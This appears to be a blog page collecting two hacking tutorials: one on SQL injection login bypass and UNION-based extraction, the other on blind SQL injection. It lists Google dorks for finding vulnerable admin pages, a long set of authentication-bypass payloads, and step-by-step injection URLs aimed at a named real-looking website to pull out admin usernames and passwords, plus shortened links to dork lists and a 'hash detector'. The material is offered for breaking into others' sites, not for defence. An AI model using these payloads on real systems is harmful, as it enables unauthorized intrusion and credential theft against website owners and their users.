Showing posts with label injection. Show all posts
Showing posts with label injection. Show all posts

Complete SQL Injection Tutorial

65 comments

Introduction:
Hello every one .
I am going to share with one of the best of my tutorials here .

Now Let's begin!!

Sql injection (aka Sql Injection or Structured Query Language Injection) is the first step in the entry to exploiting or hacking websites. It is easily done and it is a great starting off point. Unfortunately most sqli tutorials suck, so that is why I am writing this one. Sqli is just basically injecting queries into a database or using queries to get authorization bypass as an admin.

Things you should know :
Data is in the columns and the columns are in tables and the tables are in the database .
Just remember that so you understand the rest .

PART 1
Bypassing admin log in
Gaining auth bypass on an admin account.

Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:

"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
Now what to do once we get to our site.
the site should look something like this :
ADMIN USERNAME :
PASSWORD :

so what we do here is in the username we always type "Admin"
and for our password we type our sql injection

here is a list of sql injections

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'

So your input should look like this

username:Admin
password:'or'1'='1
that will confuse the site and give you authorisation to enter as admin

If the site is vulnerable than you are in :D
PART 2
Finding Sites to Inject

Finding SQLI Vulnerable sits is extremely easy all you need to do is some googling. The first thing you need to do are find some dorks.
Download SQLI dorks list from here :

http://adf.ly/cjpJ <--- password is somewhere in it
PS:I didn't put them in the thread because i passed count limit...
Pick one of those dorks and add inurl: before it (If they do not already have it) and then copy and paste it into google. Pick one of the sites off google and go to it.
For example the url of the page you are on may look like this http://www.leadacidbatteryinfo.org/newsdetail.php?id=10

To check that it is vulnerable all you have to do is add  '

So our link should look like that :
Press enter and you get some kind of error. The errors will vary...
Our page should look like that : (Click to Hide)
[Image: vulnerror.jpg]
After you find your vulnerable site the first step you need to take is to find the number of columns. The easiest way to do this is writing "order by " column number and we add "--" after the number.
Our link should look like that :

http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 15--

If you get an error that means you should lower the number of columns .

The page opened normally that means the number of columns is between 10 and 14.

The page opened normally too...

We got error . That means the columns number is 11 because we got error on 12 and 11 opened normally .

Finding Accessible Columns
Now that we have the number of columns we need to get the column numbers that we can grab information from.
We can do that by adding a "-" before the "10" replacing the " order by # " with "union all select " and columns number
Our link should look like that :

http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,8,9,10,11--

We should get numbers .
Our page should look like that : (Click to Hide)
[Image: vulncolumns.jpg]

For the end part of the url, (1,2,3,4,5,6,7,8,9,10,11) You put the number of columns you found in the first step. Since I found that the site I was testing had 11 columns, I put 1,2,3,4,5,6,7,8,9,10,11--
These numbers are the colum numbers we can get information from. We will replace them later with something else so write them down if you want.

Getting Database Version
We found that column 8 , 3 , 4 and 5 are vulnerable so we will use them to get the database version .
Why Do We Do That?
If database is under 5 that means we will have to guess the tables names
To do that we need to replace one of the vulnerable columns by "@@verion"
Let's take column 8.
Our link should look like that :

http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--

[Image: dbversion.jpg]

In our case we got "5.0.77" its >5 so we can continue.

Now we need to get the table name we want to access :
To do it we need to replace "@@version" with "table_name" and add after the last columns number "from information_schema.tables" and add the "--" in the end .
Link should be like that:

http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--

Page should look like that
[Image: tablenames.jpg]

Now we will search the table we want to access .
We should fine something with admin on it and in our case it's tbladmin
Now we need to get the ASCII value of "tbladmin".
What is ASCII?
Now to get the ASCII value of "tbladmin" go to that site : http://getyourwebsitehere.com/jswb/text_to_ascii.html


Now enter in first box the table name wich is "tbladmin" in our case and click convert to ASCII.
You will get as value that :
Code:
tbladmin
Now remove the characters as & # ; and we add a comma "," between each number .
It should be like that:
Code:
116,98,108,97,100,109,105,110


Now we replace in the URL the "table_name" to "column_name" and change "information_schema.tables" to "information_schema.columns and add "where table_name=char(ASCII value)--
in our case at place of (ASCII value) we put (116,98,108,97,100,109,105,110)--
Our URL should look like that :

http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--

Our page should be like that:
[Image: columnsm.jpg]

Now we search for the columns named "username" and "password" or something like that .
In our case it is "username" and "password".
Now we can delete most of the URL .
Remove everything after the 11 and add : "from tbladmin" And replace "column_name" with "concat(username,0x3a,password)
0x3a is the ASCII value of a : so we can separate the username from the password.
Our URL should look like t
hat:
http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin

Our page should look like that :


And you're done the username is ishir and password ishir123
Some times password is encrypted with Hashes .
Use my HASH detector to know what it is and decrypt online.
http://adf.ly/cjpJ<---- the password is in it somewhere :)
And We're Done !

I hope you liked my tutorial .
ALL credits go to me !
Thanks for reading that thread.

Read more »

Blind SQL Injections ★★★

1 comment

Step 1 Finding Vulnerabilities



Well, as you know from my first tutorial, a vulnerable website has security holes. Therefore we will take this test website:


Code:

site.com/index.php?id=1


To find out if it's vulnerable we will undergo a little test.

For that we will add some strings. As everybody knows the number 1 is equal to 1. But not to 2.

Therefore we will compare these two websites:


Code:

site.com/index.php?id=1 and 1=1

and

site.com/index.php?id=1 and 1=2


If "and 1=1" loads perfectly, but "1=2" is missing some content, the website is vulnerable.

However, if they both load without missing content, it is not vulnerable.



Step 2 Finding The Mysql Version



This isn't very much of use in this kind of injection, but it might be useful.

To find it out, you'll have to 'guess' the version.

It's either 4 or 5.

To find it out do this:


Code:

site.com/index.php?id=1 and substring(@@version,1,1)=5

or

site.com/index.php?id=1 and substring(@@version,1,1)=4
If one of them is loading without missing any content, it's that version.

(You can do the same with the database name and user)



Step 3 Guessing The Table Names.



As you can see guessing is important in
blind
sqli. That's also needed for the table and it's columns :p

To get the right table you'll have to guess it this way:

Quote:site.com/index.php?id=1 and (select 1 from insert table here limit 0,1)=1
Insert your guessed table in the underlined part. If the website is loading without content missing, then the table exists.



Suppose we've got this:


Code:

site.com/index.php?id=1 and (select 1 from admin limit 0,1)=1


Step 4 Guessing The Columns In A Table.



We will now guess the columns in this certain table (example = admin).



Do this:

Quote:site.com/index.php?id=1 and (select substring(concat(1,guessed column),1,1) from table limit 0,1)=1


This is an example:


Code:

site.com/index.php?id=1 and (select substring(concat(1,username),1,1) from admin limit 0,1)=1


Suppose we've found a username and a password column in the table admin.



Step 5 Extracting Information From The Columns



Note: You can do the same with some tools.

But I prefer to do it manually.



For this we have to put the syntax in ascii and guess it's char.

Note that each time you'll do this, you'll get 1 letter.



Do this:

Quote:site.com/index.php?id=1 and ascii(substring((select concat(column 1,0x3a,column 2) from table limit 0,1),1,1))>char number


Suppose that we've guessed 70. The website then loads normally. That means that the number must be higher.

Keep guessing until the website will load with some content missing.

So that means the first number that would load false after a number that would load true, is the right char.



Suppose that it's 85.



The example would be:


Code:

site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 0,1),1,1))>85


To get the first letter of username:password you'll have to use a asscii table.

Here is one: http://www.asciitable.com/index/asciifull.gif

Navigate to the found char (which is "dec" in the ascii table) and lookup the "chr".



That means that the char from the example (85) is the capital letter U.



To find the 2nd letter and higher you will have to change the underlined number in the syntax:

Quote:site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 1,1),1,1))>(char)

change to

site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 2,1),1,1))>(char)

site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 3,1),1,1))>(char)



etc.


You'll notice when you'll get to the end when (number),1 isn't giving any information anymore.



Suppose we've now found that the username:password = UserAdmin:BagelJuice



--



Outro



Thank you very much for reading this tutorial. If there are any
questions, or you feel like I forgot something, please don't mind to
post it here.

Also please report any grammatical errors, as I try to dodge them.



I hope I helped you with this thread
Read more »

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | coupon codes